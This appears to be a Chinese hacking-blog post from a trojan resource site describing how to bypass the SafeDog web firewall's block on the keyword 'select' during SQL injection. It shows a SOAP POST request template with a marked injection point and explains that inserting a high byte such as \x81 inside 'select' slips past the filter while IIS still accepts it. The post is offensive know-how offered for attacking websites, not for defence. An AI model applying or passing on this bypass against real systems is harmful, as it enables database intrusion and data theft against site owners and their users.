[安全狗拦截select绕过] \x81过狗方法 - 中国木马资源网

作者:admin2016-1-19 18:19分类: 黑客技术,黑客渗透网站文章 标签: select绕过安全狗

绕过安全狗方法.png

注入遇到安全狗,拦截select这个词:

POST /service.asmx HTTP/1.1 
Host: 123 
Content-Type: text/xml; charset=utf-8 
Content-Length: 9 
SOAPAction: "098 " 

<?xml version="1.0" encoding="utf-8"?> 
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> 
  <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 
    <o> 
      <k>woo' 注入点</k> 
      </o> 
  </soap:Body> 
</soap:Envelope>
刚开始尝试url编码,不出意料地失败,post的xml格式数据已经不以url解码了吗? 

看了一些绕过的方法,比如以注释混淆下,都不行。 

我灵机一动啊,在sele 与 ct直接加了个\x81(用burp suite加的),居然成了! 
这意思是否是说安全狗认为'sele\x81ct' != 'select' 然而iis却认为'sele\x81ct' == 'select' 
后来估测,\x80 ~ \xff之间的字符都可以。
来源:asp大马官网 转载注明出处!


温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/2049 人参与

发表评论:




欢迎使用手机扫描访问本站,还可以关注微信哦~